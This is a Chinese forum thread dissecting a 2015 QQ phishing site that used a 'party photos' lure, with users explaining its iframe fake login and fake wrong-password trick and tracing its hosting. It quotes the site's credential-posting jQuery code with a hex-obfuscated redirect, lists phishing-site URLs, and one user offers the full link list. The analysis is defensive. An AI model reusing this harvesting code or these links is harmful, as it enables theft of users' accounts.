15年7月,最近QQ盜號(利用所謂聚會照片)是怎麼回事?這個釣魚網站最近已經見過多次了?


專門用來盜號的。裡面都是圖片,已經扒下來了,可以看看。

http://cdn.2x360.com/Login/1/default.png

http://cdn.2x360.com/Tpl_img/20150601/556b3fb40b542.jpg

本質是背景用一張截圖,上面不可點擊,然後是一個子窗口(iframe),在這個子窗口裡面放登錄框。等你點了登錄,就會把你的資料上傳上去了。

上傳的代碼:

var t = 0;
$(".check").click(function(){
var xxoo = $("#xxoo").val();
var ooxx = $("#ooxx").val();
$.post("/Index/post",{xxoo:xxoo,ooxx:ooxx,uuuu:"219"},function(data){
if(t==0){
$(".out_alt").addClass("pas_no");
$("#ooxx").val(""); $("#ooxx").focus(); t++; }
else{var _$=["x6cx6fx63x61x74x69x6fx6e","x68x72x65x66","x68x74x74x70x3ax2fx2fx75x73x65x72x2ex71x7ax6fx6ex65x2ex71x71x2ex63x6fx6dx2fx34x30x33x33x38x32x30x33x31x2fx34"];
top[_$[0]][_$[1]]=_$[2];);

else後面是跳轉,解析出來是http://user.qzone.qq.com/403382031/4,就是截圖的那個相冊的原始ID。

所以所有流程是:騙你點擊那個網站,然後用無比粗劣的手段去仿製QQ頁面,讓你輸入信息。第一次輸入的時候,數據就會提交上去,但是提示密碼錯誤。第二次輸入的時候,才會跳到真正的那個仿製的地方去。

PS:有人注意到uuuu:"219"嗎?網址的參數裡面,數字可以改哦,改了又是一個釣魚網站,仿製的還是不同的網頁。目測是一個盜號團伙,以不同的方式釣魚、記錄、獲益。

這麼渣的技術,也好意思出來釣魚,也是醉。


最近閑得慌去調查了下這個鏈接。

1.這個鏈接的IP屬於香港一家網路公司推出的的抗攻擊伺服器。

2.通過工具發現同類IP的鏈接有好幾個。都是相同內容。

3.已有人被盜號後改密碼,該號碼連接過支付寶。但是沒錢的號碼基本沒改密碼。

4.根據反查判斷可能是浙江人。

5.這些同樣的鏈接用的都是thinkphp做引擎(不知道是不是這麼說)

網頁圖片顯示的QQ應該是被盜了,作為誘餌。類似的事件曾經出現在郵箱,簡訊,微博。如果需要全部鏈接來玩玩我可以提供。(^_^)


笑了, 之前用 Chrome Console 看了一下,於是我輸入了: 賬號:你媽逼,密碼:caonima


然後抄了幾行代碼去填垃圾信息了他們應該會過濾數據,因為有一次重新輸入,會判斷兩次輸入是否相同,相同才會錄入。


QQ好友裡面被盜號的各位應該都見了不少,被盜以後有些人還說我只是點了下那個網站,怎麼就被盜號了巴拉巴拉的。

其實並不是這樣,如果只是釣魚網站的話是沒有辦法獲取到本地的QQ密碼,除非有病毒注入本地讀取。

事實上被盜號的過程是這樣的:點進去以後,提示你快捷登錄失效,然後要求你重新輸入帳號密碼(被盜的往往都不具有安全意識所以就直接輸入了),你一單輸入自己的帳號密碼,就會直接發送到該釣魚網站所有者的後台資料庫裡面,然後自動登錄軟體

登錄你的QQ賬號密碼繼續群發給你的好友(類似於病毒式傳播)。

昨晚剛好收到一封釣魚郵件,我就做個簡單的示例

這是收到郵件。

這是提示我登錄

然後我登錄了,「bomb」!!!被騙子竊取到我的帳號密碼了!!!

我靠!我只是做個示例啊,不行,趕快改密碼「重置密保資料」

「bomb」!!!密保資料都被人知道了...

咳咳,大清早的在這開啟逗逼模式了。

不過有心的人看得到我的截圖有什麼異樣

沒錯,那就是QQ號!我登錄的QQ號是333333333(我要是真有那就直接拿去賣錢了),密碼是123456789,隨手寫的,拿去吧


QQ怎麼能


能不能幫我盜回我的qq號


我就whois一下,不用謝我,這個是他表單提交的頁面域名


推薦閱讀:

隨著互聯網的發展,哪些網路攻擊手段越來越盛行了?
8848手機安全加密,我想請問能防住網井嗎?
網警可以查得到私人聊天記錄嗎?

TAG:騰訊QQ | 網路安全 | 黑客Hacker | 計算機網路 | 釣魚網站 |